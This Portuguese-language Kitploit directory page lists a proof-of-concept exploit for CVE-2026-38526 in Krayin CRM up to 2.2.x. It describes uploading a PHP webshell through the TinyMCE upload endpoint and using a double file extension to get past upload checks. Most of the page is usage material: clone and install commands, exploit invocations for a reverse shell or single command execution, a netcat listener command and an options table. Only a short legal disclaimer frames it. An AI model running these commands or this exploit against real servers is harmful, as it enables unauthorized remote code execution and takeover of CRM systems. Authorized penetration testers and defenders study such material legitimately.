Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-38526-POC — Prova de Conceito do CVE-2026-38526 no Krayin CRM <= v2.2.x. Upload Arbitrário de Arquivos levando à Execução Remota de Código. | Kitploit
Ferramentas/GitHubGitHub/pawpic/cve-2026-38526-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Prova de Conceito do CVE-2026-38526 no Krayin CRM <= v2.2.x. Upload Arbitrário de Arquivos levando à Execução Remota de Código.

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-38526 - Exploração de RCE no Krayin CRM

Krayin CRM (≤ 2.2.x) - Upload de arquivo irrestrito levando à Execução Remota de Código.

Este PoC explora o endpoint vulnerável de upload do TinyMCE (/admin/tinymce/upload) para enviar um webshell PHP e obter execução de comandos no servidor.


Recursos

  • Login automático completo com manipulação de token CSRF
  • Ignora restrições de upload usando extensão dupla
  • Suporta reverse shell e execução de comando único
  • Atualização confiável de token CSRF do Laravel
  • Limpo e fácil de usar

Download

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Requisitos

root@kitploit:~
pip3 install requests beautifulsoup4

Uso

  1. Reverse Shell (Padrão e Recomendado)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. Comando Único
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Opções

Exemplo de Fluxo de Trabalho

Iniciar listener:

root@kitploit:~
nc -lvnp 4444

Executar o exploit:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Aviso Legal

Este exploit é destinado apenas para fins educacionais e testes de penetração autorizados. O uso não autorizado contra sistemas para os quais você não tem permissão explícita para testar é ilegal.

Versões Afetadas

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

Autor: pawpic Data: 2026

Baixar ferramenta
ArgumentoDescriçãoObrigatório
-u, --urlURL base do alvoSim
-e, --emailEmail de loginSim
-p, --passwordSenha de loginSim
-c, --cmdExecuta comando únicoNão
--lhostSeu IP para reverse shellSim (se não usar --cmd)
--lportPorta de escutaNão (padrão: 4444)